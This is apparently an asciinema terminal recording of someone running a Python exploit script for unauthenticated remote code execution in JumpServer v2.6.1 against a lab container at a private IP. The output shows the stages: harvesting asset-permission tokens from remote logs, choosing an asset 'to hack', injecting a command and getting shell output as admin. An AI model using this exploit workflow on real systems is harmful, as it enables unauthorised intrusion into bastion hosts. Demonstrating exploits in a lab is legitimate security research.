{"version": 2, "width": 236, "height": 52, "timestamp": 1611117699, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.391692, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                                                                           \r \r\u001b]2;myname@mymachine:/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce\u0007"]
[0.392411, "o", "\u001b]1;...1-unauth-rce\u0007"]
[0.402863, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0;34m\u001b[1m..[\u001b[0m\u001b[0m\u001b[1;32mmyname\u001b[1;30m@\u001b[0m\u001b[0;36mmymachine\u001b[0;34m\u001b[1m]\u001b[0m\u001b[0m - \u001b[0m\u001b[0;34m\u001b[1m[\u001b[0m\u001b[1;37m/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce\u001b[0;34m\u001b[1m]\u001b[0m\u001b[0m - \u001b[0;34m\u001b[1m[\u001b[0m\u001b[0;33m三 1月 20, 12:41\u001b[0m\u001b[0;34m\u001b[1m]\u001b[0m\u001b[0m\r\n\u001b[0;34m\u001b[1m..\u001b[1m[\u001b[1;35m$\u001b[0;34m\u001b[1m] <( (git)-[master]-)>\u001b[0m\u001b[0m \u001b[K\u001b[?1h\u001b="]
[0.403259, "o", "\u001b[?2004h"]
[2.861143, "o", "\u001b[7mpython3 ./exp.py http://192.168.56.129:8080\u001b[27m"]
[3.202926, "o", "\u001b[43D\u001b[27m\u001b[32mp\u001b[27m\u001b[32my\u001b[27m\u001b[32mt\u001b[27m\u001b[32mh\u001b[27m\u001b[32mo\u001b[27m\u001b[32mn\u001b[27m\u001b[32m3\u001b[39m\u001b[27m \u001b[27m\u001b[4m.\u001b[27m\u001b[4m/\u001b[27m\u001b[4me\u001b[27m\u001b[4mx\u001b[27m\u001b[4mp\u001b[27m\u001b[4m.\u001b[27m\u001b[4mp\u001b[27m\u001b[4my\u001b[24m\u001b[27m \u001b[27mh\u001b[27mt\u001b[27mt\u001b[27mp\u001b[27m:\u001b[27m/\u001b[27m/\u001b[27m1\u001b[27m9\u001b[27m2\u001b[27m.\u001b[27m1\u001b[27m6\u001b[27m8\u001b[27m.\u001b[27m5\u001b[27m6\u001b[27m.\u001b[27m1\u001b[27m2\u001b[27m9\u001b[27m:\u001b[27m8\u001b[27m0\u001b[27m8\u001b[27m0"]
[3.203125, "o", "\u001b[?1l\u001b>"]
[3.205271, "o", "\u001b[?2004l\r\r\n"]
[3.205677, "o", "\u001b]2;python3 ./exp.py http://192.168.56.129:8080\u0007\u001b]1;python3\u0007"]
[3.293836, "o", "2021-01-20 12:41:52,958 | exploit | [WARNING]: Note: If you use SSL, Cert Verification is disabled.\r\n"]
[7.542866, "o", "2021-01-20 12:41:57,207 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[7.745042, "o", "2021-01-20 12:41:57,409 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[18.243767, "o", "2021-01-20 12:42:07,907 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[18.44565, "o", "2021-01-20 12:42:08,109 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[21.475028, "o", "2021-01-20 12:42:11,139 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[21.677262, "o", "2021-01-20 12:42:11,341 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[22.081228, "o", "2021-01-20 12:42:11,745 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[22.282906, "o", "2021-01-20 12:42:11,947 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[22.686632, "o", "2021-01-20 12:42:12,350 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[22.888425, "o", "2021-01-20 12:42:12,552 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[26.522974, "o", "2021-01-20 12:42:16,187 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[26.724788, "o", "2021-01-20 12:42:16,388 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[27.53273, "o", "2021-01-20 12:42:17,196 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[27.734301, "o", "2021-01-20 12:42:17,398 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[27.936205, "o", "2021-01-20 12:42:17,600 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[28.138047, "o", "2021-01-20 12:42:17,802 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[29.349465, "o", "2021-01-20 12:42:19,013 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[29.55151, "o", "2021-01-20 12:42:19,215 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[30.15745, "o", "2021-01-20 12:42:19,821 | remotelog | [INFO]: Found 1 asset! Processing...\r\n"]
[30.359298, "o", "2021-01-20 12:42:20,023 | remotelog | [INFO]: Assets Processing Done. Wait for next assets or jump out...\r\n"]
[30.360829, "o", "2021-01-20 12:42:20,025 | stage2 | [INFO]: ---------------------START SELECT ASSET YOU WANNA HACK ------------------------------\r\n"]
[30.360888, "o", "2021-01-20 12:42:20,025 | stage2 | [INFO]: Use the number before the URL:\r\n0: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=e388fb4e-0d9d-492e-a2a4-9da2eaf9aea5&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n1: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=e388fb4e-0d9d-492e-a2a4-9da2eaf9aea5&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n2: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=e388fb4e-0d9d-492e-a2a4-9da2eaf9aea5&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n3: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=e388fb4e-0d9d-492e-a2a4-9da2eaf9aea5&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n"]
[30.360995, "o", "4: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=5a048edd-f717-4676-a336-9159941bd53a&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n5: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=5a048edd-f717-4676-a336-9159941bd53a&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n6: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=5a048edd-f717-4676-a336-9159941bd53a&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n7: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=5a048edd-f717-4676-a336-9159941bd53a&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n8: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84"]
[30.361046, "o", "fb2e70b&cache_policy=1&system_user_id=5a048edd-f717-4676-a336-9159941bd53a&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n9: /api/v1/perms/asset-permissions/user/validate/?action_name=connect&asset_id=e5df0c07-5b37-47da-9c3f-4fb84fb2e70b&cache_policy=1&system_user_id=5a048edd-f717-4676-a336-9159941bd53a&user_id=3076c098-a11b-4679-84a4-da711b558dda\r\n2021-01-20 12:42:20,025 | stage2 | [INFO]: ----------------------DONE SELECT ASSET YOU WANNA HACK ------------------------------\r\n\r\r\n\r\nChoose one you want to hack? (int)"]
[32.670137, "o", "9"]
[33.018449, "o", "\r\n"]
[33.018586, "o", "2021-01-20 12:42:22,682 | stage2 | [INFO]: Due to the time limitation and expiration of token:\r\n2021-01-20 12:42:22,682 | stage2 | [INFO]: Please input the command you wanna execute at the very beginning: \r\n\r\r\n\r\n"]
[33.018646, "o", "Execute Command? "]
[34.20575, "o", "l"]
[34.327391, "o", "s"]
[34.496543, "o", " "]
[34.58622, "o", "-"]
[34.712641, "o", "a"]
[34.827496, "o", "l"]
[34.989162, "o", "h"]
[35.21898, "o", " "]
[35.369316, "o", "/"]
[36.653841, "o", "\r\n"]
[36.654064, "o", "2021-01-20 12:42:26,318 | stage2 | [INFO]: -------------------------------------------------------------------------\r\n"]
[36.654099, "o", "2021-01-20 12:42:26,318 | stage2 | [INFO]: If default request for token exchanging is failed, try again.\r\n"]
[36.654223, "o", "2021-01-20 12:42:26,318 | stage2 | [INFO]:  You should see :  `!!!! FAILED !!!!` notification BEFORE you try again.\r\n2021-01-20 12:42:26,318 | stage2 | [INFO]: Possible Reason: Previous Token Expired, OR API Endpoint blocked.\r\n"]
[36.654259, "o", "2021-01-20 12:42:26,318 | stage2 | [INFO]: Try: Re-run this program or change PATH_PAYLOAD_2_USE to PATH_PAYLOAD_2_ALT.\r\n"]
[36.654373, "o", "2021-01-20 12:42:26,318 | stage2 | [INFO]: -------------------------------------------------------------------------\r\n"]
[36.739739, "o", "2021-01-20 12:42:26,403 | stage3 | [WARNING]: Please wait patiently, it might cost about 1min...\r\n"]
[36.796855, "o", "开始连接到 admin@192.168.56.129  0.0\r\n\b\b\b0.0\r\n"]
[36.886658, "o", "\r\r\n\r\n\u001b]2;ssh://admin@192.168.56.129\u0007\r\n"]
[36.899336, "o", "Last login: Wed Jan 20 03:57:47 2021 from 192.168.250.1\r\r\r\n\u001b[?2004h\u001b]0;admin@2f30f07a2912: ~\u0007admin@2f30f07a2912:~$ \r\n"]
[36.899467, "o", "2021-01-20 12:42:26,563 | stage3 | [INFO]: Code Execution Done! Receiving reply...\r\n"]
[36.899508, "o", "2021-01-20 12:42:26,563 | stage3 | [WARNING]: This program cannot recognize the end of reply, if you see the response you need, just ^C to kill it.\r\n"]
[36.901005, "o", "ls -alh /\r\r\n\u001b[?2004l\r\r\n"]
[36.902621, "o", "total 96K\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:13 \u001b[0m\u001b[01;34m.\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:13 \u001b[01;34m..\u001b[0m\r\r\n-rwxr-xr-x   1 root root    0 Jan 19 11:13 \u001b[01;32m.dockerenv\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:15 \u001b[01;34mbin\u001b[0m\r\r\ndrwxr-xr-x   2 root root 4.0K Jul  9  2019 \u001b[01;34mboot\u001b[0m\r\r\ndrwxr-xr-x   5 root root  340 Jan 20 01:12 \u001b[01;34mdev\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:16 \u001b[01;34metc\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:16 \u001b[01;34mhome\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:13 \u001b[01;34mlib\u001b[0m\r\r\ndrwxr-xr-x   2 root root 4.0K Jan 11 00:00 \u001b[01;34mlib64\u001b[0m\r\r\ndrwxr-xr-x   2 root root 4.0K Jan 11 00:00 \u001b[01;34mmedia\u001b[0m\r\r\ndrwxr-xr-x   2 root root 4.0K Jan 11 00:00 \u001b[01;34mmnt\u001b[0m\r\r\ndrwxr-xr-x   2 root root 4.0K Jan 11 00:00 \u001b[01;34mopt\u001b[0m\r\r\ndr-xr-xr-x 289 root root    0 Jan 20 01:12 \u001b[01;34mproc\u001b[0m\r\r\ndrwx------   1 root root 4.0K Jan 19 11:15 \u001b[01;34mroot\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 19 11:13 \u001b[01;34mrun\u001b[0m\r\r\ndrwxr-xr-x   1 root "]
[36.902749, "o", "root 4.0K Jan 19 \r\n11:13 \u001b[01;34msbin\u001b[0m\r\r\ndrwxr-xr-x   2 root root 4.0K Jan 11 00:00 \u001b[01;34msrv\u001b[0m\r\r\n-rwxr-xr-x   1 root root  115 Jan 19 06:26 \u001b[01;32mstart.sh\u001b[0m\r\r\ndr-xr-xr-x  13 root root    0 Jan 20 01:12 \u001b[01;34msys\u001b[0m\r\r\ndrwxrwxrwt   1 root root 4.0K Jan 19 11:16 \u001b[30;42mtmp\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 11 00:00 \u001b[01;34musr\u001b[0m\r\r\ndrwxr-xr-x   1 root root 4.0K Jan 11 00:00 \u001b[01;34mvar\u001b[0m\r\r\n\r\n"]
[36.902928, "o", "\u001b[?2004h\u001b]0;admin@2f30f07a2912: ~\u0007admin@2f30f07a2912:~$ \r\r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;admin@2f30f07a2912: ~\u0007admin@2f30f07a2912:~$ \r\n"]
[42.816128, "o", "^C"]
[42.816276, "o", "Traceback (most recent call last):\r\n"]
[42.816415, "o", "  File \"/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce/./exp.py\", line 279, in <module>\r\n"]
[42.816559, "o", "    __main__()\r\n  File \"/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce/./exp.py\", line 276, in __main__\r\n"]
[42.816623, "o", "    action3.run()\r\n  File \"/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce/./exp.py\", line 259, in run\r\n"]
[42.816694, "o", "    self.loop.run_until_complete(runWS_rce(currurl, currssl, self.upper.s3cmd))\r\n  File \"/usr/lib/python3.9/asyncio/base_events.py\", line 629, in run_until_complete\r\n"]
[42.816771, "o", "    self.run_forever()\r\n  File \"/usr/lib/python3.9/asyncio/base_events.py\", line 596, in run_forever\r\n"]
[42.816928, "o", "    self._run_once()\r\n  File \"/usr/lib/python3.9/asyncio/base_events.py\", line 1854, in _run_once\r\n"]
[42.817136, "o", "    event_list = self._selector.select(timeout)\r\n  File \"/usr/lib/python3.9/selectors.py\", line 469, in select\r\n"]
[42.817262, "o", "    fd_event_list = self._selector.poll(timeout, max_ev)\r\nKeyboardInterrupt\r\n"]
[42.831191, "o", "\r\n"]
[42.831412, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                                                                           \r \r\u001b]2;myname@mymachine:/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce\u0007\u001b]1;...1-unauth-rce\u0007"]
[42.839062, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0;34m\u001b[1m..[\u001b[0m\u001b[0m\u001b[1;32mmyname\u001b[1;30m@\u001b[0m\u001b[0;36mmymachine\u001b[0;34m\u001b[1m]\u001b[0m\u001b[0m - \u001b[0m\u001b[0;34m\u001b[1m[\u001b[0m\u001b[1;37m/myfolder/GitBin/anfu-exphub/jumpserver-v2.6.1-unauth-rce\u001b[0;34m\u001b[1m]\u001b[0m\u001b[0m - \u001b[0;34m\u001b[1m[\u001b[0m\u001b[0;33m三 1月 20, 12:42\u001b[0m\u001b[0;34m\u001b[1m]\u001b[0m\u001b[0m\r\n\u001b[0;34m\u001b[1m..\u001b[1m[\u001b[1;35m$\u001b[0;34m\u001b[1m] <( (git)-[master]-)>\u001b[0m\u001b[0m \u001b[K"]
[42.839232, "o", "\u001b[?1h\u001b="]
[42.839495, "o", "\u001b[?2004h"]
[44.320786, "o", "\u001b[4me\u001b[24m"]
[44.431193, "o", "\b\u001b[4me\u001b[4mx\u001b[24m"]
[44.535832, "o", "\b\b\u001b[24m\u001b[1m\u001b[31me\u001b[24m\u001b[1m\u001b[31mx\u001b[1m\u001b[31mi\u001b[0m\u001b[39m"]
[44.627685, "o", "\b\b\b\u001b[0m\u001b[32me\u001b[0m\u001b[32mx\u001b[0m\u001b[32mi\u001b[32mt\u001b[39m"]
[44.993187, "o", "\u001b[?1l\u001b>"]
[44.994391, "o", "\u001b[?2004l\r\r\n"]
[44.994662, "o", "\u001b]2;exit\u0007\u001b]1;exit\u0007"]
